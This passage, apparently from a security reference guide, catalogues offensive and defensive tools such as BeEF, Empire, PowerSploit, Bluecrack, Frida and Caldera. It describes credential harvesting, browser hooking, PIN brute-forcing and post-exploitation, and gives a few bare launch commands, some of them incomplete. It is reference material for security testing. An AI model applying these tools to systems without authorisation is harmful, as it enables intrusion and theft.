This information can be valuable for understanding the target organization and identifying potential attack vectors.
Email Collection: Harvest email addresses from different sources such as search engines and social media.
Domain Enumeration: Discover domain names and subdomains associated with a target organization.
Public Information Gathering: Collect information from public sources like search engines, social networks, and DNS records.
Multiple Data Sources: Utilizes various APIs and search engines to gather information.
Use Case: Collecting emails, names, and other information from public sources.
Example: Gathering information on a target organization from search engines and social networks.
Usage → python3 -d -b google
Purpose: Data mining tool for link analysis and information gathering.
Maltego is a powerful open-source intelligence (OSINT) and graphical link analysis tool designed for conducting comprehensive reconnaissance and analysis.
It is widely used in cybersecurity, investigations, and intelligence gathering to discover relationships and patterns between various entities such as people, organizations, domains, and IP addresses.
Maltego offers a visual interface that allows users to map out and analyze complex networks of information.
Graphical Link Analysis: Visualize and analyze relationships between different data points.
Transformations: Use built-in and custom transformations to gather data from various sources.
Data Integration: Integrate data from different sources, including DNS records, social networks, and WHOIS information.
Customizable: Create and use custom transformations and data sources.
Collaboration: Share and collaborate on investigative graphs with team members.
Use Case: Mapping relationships and gathering detailed information on targets.
Example: Visualizing the connections between individuals within an organization.
Purpose: Web reconnaissance framework.
Recon-ng is an open-source reconnaissance framework designed for gathering information during the reconnaissance phase of security assessments.
It provides a modular and flexible environment for performing OSINT (Open Source Intelligence) to collect and analyze data from various public sources.
Recon-ng is particularly useful for security professionals and penetration testers looking to automate and streamline the information-gathering process.
Modular Framework: Consists of various modules for different types of reconnaissance, including domain information, email addresses, and more.
API Integration: Supports numerous APIs for data collection from public and commercial sources.
Customizable: Allows users to create and use custom modules and scripts.
Automated Data Collection: Automates the process of querying and collecting data from multiple sources.
Interactive Console: Provides an interactive command-line interface for easy navigation and operation.
Use Case: Performing automated reconnaissance on targets.
Example: Gathering domain and contact information about a target organization.
Usage → python3 recon-ng
Browser Exploitation Framework (BeEF)
Purpose: Browser exploitation tool.
BeEF (Browser Exploitation Framework) is a penetration testing tool designed to assess the security of web browsers.
BeEF focuses on leveraging browser vulnerabilities and misconfigurations to gain access to the client-side environment.
It allows security professionals to demonstrate and exploit weaknesses in browser security by taking control of web browsers through various attack vectors.
Client-Side Attacks: Exploits vulnerabilities and weaknesses in web browsers to gain control over the client-side environment.
Social Engineering: Uses social engineering techniques to deliver payloads and exploits.
Real-Time Interaction: Provides real-time interaction with compromised browsers through a web-based interface.
Extensive Modules: Includes a wide range of modules for different types of attacks, such as phishing, credential harvesting, and session hijacking.
Post-Exploitation: Allows for post-exploitation activities like capturing screenshots, keylogging, and more.
Use Case: Using browser vulnerabilities to gather information or deliver payloads.
Example: Hooking a target’s browser to control it and deliver exploits.
Scapy is an open-source Python library used for packet manipulation and network analysis.
It allows users to create, send, receive, and analyze network packets with a high level of flexibility.
Scapy is often used in network penetration testing, security research, and network troubleshooting due to its powerful capabilities for crafting and analyzing packets.
Packet Crafting: Create custom packets with a wide range of protocols.
Packet Analysis: Analyze and dissect network packets.
Network Scanning: Perform network scanning and discovery.
Protocol Support: Supports a wide range of protocols, including Ethernet, IP, TCP, UDP, ICMP, and more.
Scripting: Write scripts to automate network tasks and analyses.
Use Case: Crafting and sending custom network packets for penetration testing.
Example: Performing packet crafting to test for vulnerabilities in the CAN bus or Modbus protocols.
Function: Proxy tool for relaying TCP connections.
tcprelay is a tool used to relay TCP traffic between two endpoints.
It is often used in network testing and troubleshooting to redirect TCP connections from one port to another or from one host to another.
It can be useful in scenarios where you need to forward traffic between systems or services, or when you want to redirect traffic for analysis or testing purposes.
TCP Traffic Forwarding: Relay TCP traffic from one port to another or between hosts.
Port Redirection: Redirect traffic from a local port to a remote port or vice versa.
Flexible Configuration: Configure different source and destination ports and addresses.
Simple Setup: Easy to set up and use for basic TCP traffic forwarding tasks.
Use Case: Forwarding traffic between different network interfaces for testing and debugging.
Example: Relaying traffic from an OT network to analyze and modify data in transit.
Function: Network protocol analyzer and packet capture tool.
Use Case: Capturing and analyzing network traffic.
Example: Monitoring CAN bus or Modbus traffic to detect malicious activity or replay attacks.
MobSF (Mobile Security Framework)
Function: Automated security analysis tool for mobile applications.
MobSF (Mobile Security Framework) is an open-source automated mobile application security testing tool designed to perform static and dynamic analysis of mobile applications.
It is widely used by security professionals and developers to identify vulnerabilities and security issues in mobile apps for both Android and iOS platforms.
Static Analysis: Analyzes the application’s source code, binaries, and artifacts without executing the app.
Dynamic Analysis: Executes the application to identify runtime vulnerabilities and issues.
API Testing: Assesses the security of APIs used by the mobile application.
Malware Analysis: Detects potential malware or malicious behavior in mobile apps.
Reporting: Generates detailed reports on security findings, including recommendations for remediation.
Use Case: Static and dynamic analysis of Android and iOS apps.
Example: Analyzing mobile applications for information disclosure, permission abuse, or other security flaws.
Usage:python3 runserver
Function: Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.
Frida is a dynamic instrumentation toolkit used for reverse engineering and security research.
It allows users to inject code into running processes, enabling real-time analysis and manipulation of applications.
Frida is widely used for debugging, analyzing, and modifying applications on various platforms, including Android, iOS, Windows, and macOS.
Dynamic Instrumentation: Inject and execute custom scripts in real-time within a running process.
Cross-Platform Support: Works on Android, iOS, Windows, macOS, and Linux.
JavaScript API: Write scripts in JavaScript to interact with and modify processes.
API Hooking: Hook into native functions and APIs to monitor or alter their behavior.
Remote Support: Perform remote instrumentation on devices over the network.
Use Case: Injecting scripts into running processes for debugging and analysis.
Example: Manipulating mobile app behavior or intercepting and modifying OT system commands in real-time.
Function: Comprehensive security audit and attack framework for Android.
Drozer is a comprehensive security assessment tool designed for Android applications.
It focuses on identifying and exploiting vulnerabilities in Android apps and the underlying Android operating system.
Drozer provides a suite of tools for performing security assessments, ranging from discovering vulnerabilities to exploiting them.
Application Scanning: Identify security issues in Android apps, including insecure components and permissions.
Dynamic Analysis: Analyze running applications to find vulnerabilities and exploit them in real-time.
Exploit Modules: Utilize pre-built modules to exploit known vulnerabilities in Android applications.
Custom Scripting: Write custom scripts to automate and extend Drozer’s capabilities.
Interactivity: Interact with Android applications and their components programmatically.
Use Case: Assessing the security of Android applications.
Example: Testing Android apps for vulnerabilities such as information disclosure or misuse of permissions.
Usage:drozer console connect
Android Debug Bridge (ADB)
Function: Command-line tool for interacting with Android devices.
Android Debug Bridge (ADB) is a versatile command-line tool that allows developers and security professionals to communicate with Android devices.
It provides various functionalities for debugging, managing, and controlling Android devices and emulators.
ADB is a key component of the Android SDK (Software Development Kit) and is widely used for development, troubleshooting, and testing.
Device Management: Interact with and manage Android devices and emulators.
Application Management: Install, uninstall, and manage applications on Android devices.
File Transfer: Transfer files between a computer and an Android device.
Debugging: Execute commands and scripts to debug applications and system components.
System Commands: Access and execute system commands on a connected device.
Use Case: Installing and debugging apps, accessing device logs, and executing shell commands.
Example: Using ADB to gain access to a rooted device for further analysis or exploitation.
Usage:adb start-server
Function: Bluetooth security tool.
Bluecrack is a tool designed for attacking Bluetooth devices, specifically targeting Bluetooth devices using the Bluetooth Classic (BR/EDR) protocol.
It is primarily used to perform brute-force attacks on Bluetooth PINs to gain unauthorized access to Bluetooth devices.
Bluecrack aims to crack the PIN codes of Bluetooth devices, which can be crucial for security testing and penetration testing.
Brute-Force Attacks: Performs brute-force attacks on Bluetooth PINs.
PIN Cracking: Attempts to guess the PIN codes used for pairing Bluetooth devices.
Bluetooth Classic Support: Targets Bluetooth devices using Bluetooth Classic (BR/EDR).
Use Case: Testing Bluetooth devices for security weaknesses.
Example: Performing Bluetooth attacks such as Bluejacking or capturing Bluetooth communications.
Usage:bluecrack -i <interface> -a <target_address> -p <pin>
Empire is a PowerShell and Python-based post-exploitation framework that enables red teaming and penetration testing. It provides a range of tools and modules for command-and-control, lateral movement, and data exfiltration.
Empire Features:
PowerShell and Python-Based: Utilizes both PowerShell and Python for various tasks.
Agent Management: Provides capabilities to manage and control multiple agents on compromised systems.
Command and Control: Offers a robust command and control infrastructure.
Post-Exploitation Modules: Includes a wide range of modules for tasks like credential harvesting, privilege escalation, and data exfiltration.
PowerSploit is a collection of PowerShell scripts and modules designed for use in penetration testing and red team operations. It focuses on exploiting and post-exploitation on Windows systems, leveraging PowerShell capabilities.
PowerSploit Features:
PowerShell-Based: Utilizes PowerShell for various post-exploitation and exploitation tasks.
Modular: Includes modules for a variety of tasks such as privilege escalation, credential dumping, and persistence.
Red Team Operations: Designed for red team engagements and penetration testing.
Example: Running PowerShell scripts to perform privilege escalation, credential dumping, and other attacks.
Function: Network situational awareness tool.
PowerView is a PowerShell tool developed as part of the PowerSploit framework.
It is designed for enumerating and interacting with Active Directory (AD) environments.
PowerView is particularly useful for penetration testers and red teamers who need to gather information about AD environments, identify potential attack vectors, and perform various AD-related tasks.
AD Enumeration: Collect information about AD objects such as users, groups, and computers.
Kerberos and NTLM: Exploit AD authentication mechanisms to gather information and perform attacks.
Privilege Escalation: Identify potential privilege escalation paths and gather information for further exploitation.
LDAP Queries: Perform advanced LDAP queries to extract information from AD.
Domain Trusts: Discover and enumerate domain trusts to understand the AD forest structure.
Use Case: Automating the discovery and enumeration of Active Directory (AD) environments.
Example: Mapping out AD environments to identify high-value targets and potential attack paths.
Function: SQL Server post-exploitation toolkit.
PowerUpSQL is a PowerShell tool designed to assess and exploit SQL Server instances.
It is used to identify and exploit vulnerabilities in SQL Server installations, primarily focusing on security assessments and privilege escalation.
PowerUpSQL is a valuable tool for penetration testers and red teamers who need to interact with SQL Server environments.
SQL Server Enumeration: Discover SQL Server instances, databases, and associated configurations.
Privilege Escalation: Identify potential privilege escalation paths and misconfigurations in SQL Server.
Exploit Vulnerabilities: Exploit known vulnerabilities and misconfigurations in SQL Server installations.
Configuration Checks: Check for common SQL Server misconfigurations that could be exploited.
Use Case: Automating SQL Server attacks.
Example: Identifying misconfigurations and vulnerabilities in SQL Server instances.
AD search
Function: Active Directory search and enumeration.
Active Directory (AD) Search refers to the process of querying and retrieving information from an Active Directory environment.
This can involve searching for objects such as users, groups, computers, and other entities within the AD domain.
Various tools and techniques can be used for AD search, ranging from built-in Windows utilities to specialized PowerShell scripts and third-party tools.
Use Case: Automating the search for AD objects and attributes.
Example: Extracting user and group information from AD to facilitate privilege escalation.
Caldera is an open-source automated adversary emulation and red teaming platform developed by MITRE.
It is designed to automate the process of simulating sophisticated adversarial tactics, techniques, and procedures (TTPs) within an organization’s network.
Caldera provides a way to test and validate security defenses by simulating real-world attacks and is often used in security assessments, red teaming, and adversary emulation exercises.
Automated Adversary Emulation: Simulates adversary behavior by automating attack scenarios based on the MITRE ATT&CK framework.
Customizable Scenarios: Allows users to create and customize attack scenarios to fit specific security assessment needs.
Modular Architecture: Includes various modules for different attack techniques, enabling flexible and extensible simulations.
Interactive Dashboard: Provides an interface for managing and monitoring simulations, tracking progress, and analyzing results.
Use Case: Simulating advanced persistent threat (APT) behaviors.
Example: Running automated attack scenarios to test defenses and identify weaknesses.
Infection Monkey
Function: Open-source breach and attack simulation tool.
Infection Monkey is an open-source network security assessment tool developed by Guardicore (now part of Akamai).
It is designed to simulate a malware infection and analyze how well an organization’s network security controls can detect and respond to such infections.
The tool focuses on mapping network vulnerabilities and assessing how an infection spreads through the network, helping organizations identify weaknesses and improve their defenses.
Network Mapping: Visualizes the network topology and identifies potential vulnerabilities and attack paths.
Simulated Malware Spread: Simulates how malware would spread through the network, allowing you to observe the effectiveness of security controls.
Customizable Attack Scenarios: Offers options to customize the attack scenarios and configure the simulated malware behavior.
Interactive Dashboard: Provides a web-based interface for monitoring and managing simulations, visualizing results, and analyzing network security posture.
Use Case: Simulating various attack techniques and paths.
Example: Automating the infection and lateral movement within a network to test security controls.
Atomic Red Team
Function: Library of tests mapped to the MITRE ATT&CK framework.
Atomic Red Team is an open-source project developed by Red Canary, designed to provide a collection of small, atomic tests that simulate real-world adversary behaviors.
These tests are used to evaluate the effectiveness of security controls and detection capabilities against tactics, techniques, and procedures (TTPs) commonly used by attackers, based on the MITRE ATT&CK framework.
Atomic Tests: Provides a library of simple, focused tests that simulate specific adversary behaviors.
MITRE ATT&CK Mapping: Each test is mapped to MITRE ATT&CK techniques, helping to assess detection and response capabilities.
Modular and Customizable: Tests are designed to be easy to execute and customize, allowing users to adapt them to their specific environments.
Integration: Supports integration with various security tools and platforms for automated testing and analysis.
Use Case: Automating the execution of specific attack techniques.
Example: Running individual tests to verify the effectiveness of security controls against specific attack techniques.